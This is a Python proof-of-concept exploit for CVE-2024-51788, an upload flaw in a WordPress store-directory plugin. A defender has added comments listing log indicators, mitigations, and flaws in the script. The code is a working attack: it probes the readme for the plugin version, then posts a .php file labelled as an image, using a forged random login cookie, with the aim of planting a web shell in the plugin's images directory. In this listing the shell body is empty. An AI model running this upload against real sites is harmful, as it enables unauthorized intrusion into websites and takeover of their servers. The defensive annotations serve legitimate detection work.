# Proof-of-concept script for CVE-2024-51788 (the identifier comes from the
# argparse description at the bottom), aimed at the WordPress plugin whose
# directory is "noveldesign-store-directory".
#
# Reviewer notes for defenders -- what this script leaves in logs and on disk:
#   * GET  <site>/wp-content/plugins/noveldesign-store-directory/readme.txt
#   * POST <site>/wp-admin/options-general.php?page=licence as multipart/form-data
#     with a "default_shop_image" part whose filename ends in ".php" while its
#     declared content type is "image/jpeg", plus "btn_default_shop_image=Upload".
#   * A cookie literally named "wordpress_logged_in" (no hash suffix) holding 64
#     random alphanumeric characters.
#   * A file named Nxploit_<4 digits>.php expected under the plugin's images/
#     directory. The name prefix is specific to this script; monitoring should
#     key on any script file appearing in that directory, not on the prefix.
# Mitigation direction: update or remove the plugin per the CVE advisory, and
# deny script execution in upload/image directories at the web-server level.

# Banner only; it has no effect on the requests sent.
print(''' :'######::'##::::'##:'########:::::::::::'#######::::'#####::::'#######::'##:::::::::::::::::'########::::'##:::'########::'#######:::'#######:: '##... ##: ##:::: ##: ##.....:::::::::::'##.... ##::'##.. ##::'##.... ##: ##:::'##::::::::::: ##.....:::'####::: ##.. ##:'##.... ##:'##.... ##: ##:::..:: ##:::: ##: ##::::::::::::::::..::::: ##:'##:::: ##:..::::: ##: ##::: ##::::::::::: ##::::::::.. ##:::..:: ##::: ##:::: ##: ##:::: ##: ##::::::: ##:::: ##: ######:::'#######::'#######:: ##:::: ##::'#######:: ##::: ##::'#######: #######::::: ##:::::: ##::::: #######::: #######:: ##:::::::. ##:: ##:: ##...::::........:'##:::::::: ##:::: ##:'##:::::::: #########:........:...... ##:::: ##::::: ##:::::'##.... ##:'##.... ##: ##::: ##::. ## ##::: ##:::::::::::::::: ##::::::::. ##:: ##:: ##::::::::...... ##:::::::::::'##::: ##:::: ##::::: ##::::: ##:::: ##: ##:::: ##: . ######::::. ###:::: ########:::::::::: #########::. #####::: #########::::::: ##:::::::::::. ######:::'######::: ##:::::. #######::. 
#######:: :......::::::...:::::........:::::::::::.........::::.....::::.........::::::::..:::::::::::::......::::......::::..:::::::.......::::.......::: ''')

# Exploit By: Coded By : Nxploit | Khaled ALenazi,
import requests
import random
import string
import argparse
from urllib3.exceptions import InsecureRequestWarning

# Silences the warning urllib3 emits for unverified HTTPS requests. Every
# request below is sent with certificate verification off, so response content
# (including the readme used for the version check) is not authenticated.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Site-relative directory that the success message reports as the upload
# location. It is only printed; no request is made to confirm a file exists there.
UPLOAD_DIR = "/wp-content/plugins/noveldesign-store-directory/images/"

# Fixed desktop-Chrome User-Agent sent on every request. A constant UA is at
# best a weak indicator for detection.
USER_AGENT = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/113.0.0.0 Safari/537.36"
)


def generate_random_cookie() -> str:
    """Return 64 random ASCII letters and digits.

    The value comes from the non-cryptographic ``random`` module and is not
    derived from any login flow, so it cannot correspond to a real session.
    """
    return ''.join(random.choices(string.ascii_letters + string.digits, k=64))


def check_version(target_url: str) -> bool:
    """Fetch the plugin's readme.txt and decide whether to continue.

    Args:
        target_url: Base URL of the site, without a trailing slash.

    Returns:
        True if the readme contains a matching "Stable tag" string, or if the
        readme request returned a status other than 200; False only when the
        readme was fetched and no matching tag was found.
    """
    url_version = f"{target_url}/wp-content/plugins/noveldesign-store-directory/readme.txt"
    # No timeout is passed, so an unresponsive host blocks this call.
    response = requests.get(url_version, verify=False, headers={"User-Agent": USER_AGENT})
    if response.status_code == 200:
        # NOTE(review): "Stable tag: 4." already matches "Stable tag: 4.3.0", so
        # the first test is redundant and every 4.x tag is reported as
        # vulnerable. Treat a positive result as "plugin present, 4.x" rather
        # than as confirmation; check the affected range in the advisory.
        if "Stable tag: 4.3.0" in response.text or "Stable tag: 4." in response.text:
            print("[✔] Target is vulnerable! Continuing exploitation...\n")
            return True
        print("[✘] Target does not appear to be vulnerable. Exiting.\n")
        return False
    # Any non-200 status (readme blocked, plugin absent, server error) falls
    # through here and is still treated as "go ahead".
    print("[!] Could not verify version. Proceeding with exploitation...\n")
    return True


def upload_shell(target_url: str) -> None:
    """Send the multipart upload request to the plugin's settings page.

    Args:
        target_url: Base URL of the site, without a trailing slash.

    Prints a success or failure message based solely on the HTTP status code.
    """
    upload_url = f"{target_url}/wp-admin/options-general.php?page=licence"
    # The cookie jar imitates a logged-in browser but holds no real credential:
    # "wordpress_logged_in" is filled with random characters. That the script
    # expects the request to work anyway suggests the upload handler runs
    # without a valid session -- inferred from this script; confirm against
    # the CVE advisory.
    cookies = {
        "wordpress_logged_in": generate_random_cookie(),
        "wp_lang": "en_US",
        "wp-settings-1": "libraryContent=browse&urlbutton=post&hidetb=1",
        "wp-settings-time-1": str(random.randint(1600000000, 1800000000)),
    }
    shell_name = f"Nxploit_{random.randint(1000, 9999)}.php"
    # The payload body is empty in this listing, so the request as written
    # would upload a zero-byte .php file.
    shell_content = ""
    # A ".php" filename is paired with a declared "image/jpeg" content type.
    # Server-side validation that trusts the client-supplied type instead of
    # checking the extension and file contents is what this mismatch probes.
    files = {
        "default_shop_image": (shell_name, shell_content, "image/jpeg"),
        "btn_default_shop_image": (None, "Upload"),
    }
    session = requests.Session()
    session.verify = False
    response = session.post(upload_url, files=files, cookies=cookies, headers={"User-Agent": USER_AGENT})
    # NOTE(review): status 200 is the only success criterion. The script never
    # requests the uploaded path, so "successfully uploaded" is unverified --
    # a login page or error page served with 200 produces the same message.
    if response.status_code == 200:
        print("[✔] Web Shell successfully uploaded!")
        print(f" [+] Shell is located in: {UPLOAD_DIR}\n")
    else:
        print("[✘] Exploit failed. Server did not respond as expected.\n")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-51788 by Nxploit Khaled Alenazi.')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    args = parser.parse_args()
    # Trailing slashes are stripped because the paths appended above start with "/".
    target = args.url.rstrip('/')
    print(f"[*] Checking if {target} is vulnerable...\n")
    if check_version(target):
        print("[*] Attempting to upload Web Shell...\n")
        upload_shell(target)